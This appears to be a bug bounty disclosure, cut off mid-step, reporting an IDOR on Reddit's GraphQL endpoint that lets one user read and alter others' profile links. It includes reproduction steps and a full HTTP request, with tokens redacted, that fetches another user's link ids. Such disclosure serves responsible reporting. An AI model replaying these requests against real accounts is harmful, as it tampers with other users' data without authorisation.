📚 Reddit: IDOR allows an attacker to modify the links of any user

Hi team! I found an IDOR which allows to modify the links of any user. Users can put their custom links or social media links on their profile, ex: {F1855366} To reproduce this: Replicate the following request by replacing it with your own authentication headers: You must also put in the body of the request, in the parameter "username" the username that you want, you can try my username: "criptexhackerone1". This request will return in the response the links of any user profile with the "id" of each link. ``` POST / HTTP/2 Host: gql.reddit.com Content-Length: 62 Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103" X-Reddit-Loid: * * * * * * * * * * * * * * * * Sec-Ch-Ua-Mobile: ?0 Authorization: Bearer * * * * * * * * * * * * * * * * * * * * * Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/531.36 X-Reddit-Compression: 1 X-Reddit-Session: * * * * * * * * * * * * * * * * * Sec-Ch-Ua-Platform: "Windows" Accept: /* Origin: https://www.reddit.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.reddit.com/ Accept-Encoding: gzip, deflate Accept-Language: es-ES,es;q=0.9,en-US;q=0.8,en;q=0.7,bs;q=0.6,ja;q=0.5 {"id":"11a239b07f86","variables":{"username":"***"}} ``` When you get some "id" save it. In the next request you have to put in the request body, in... ...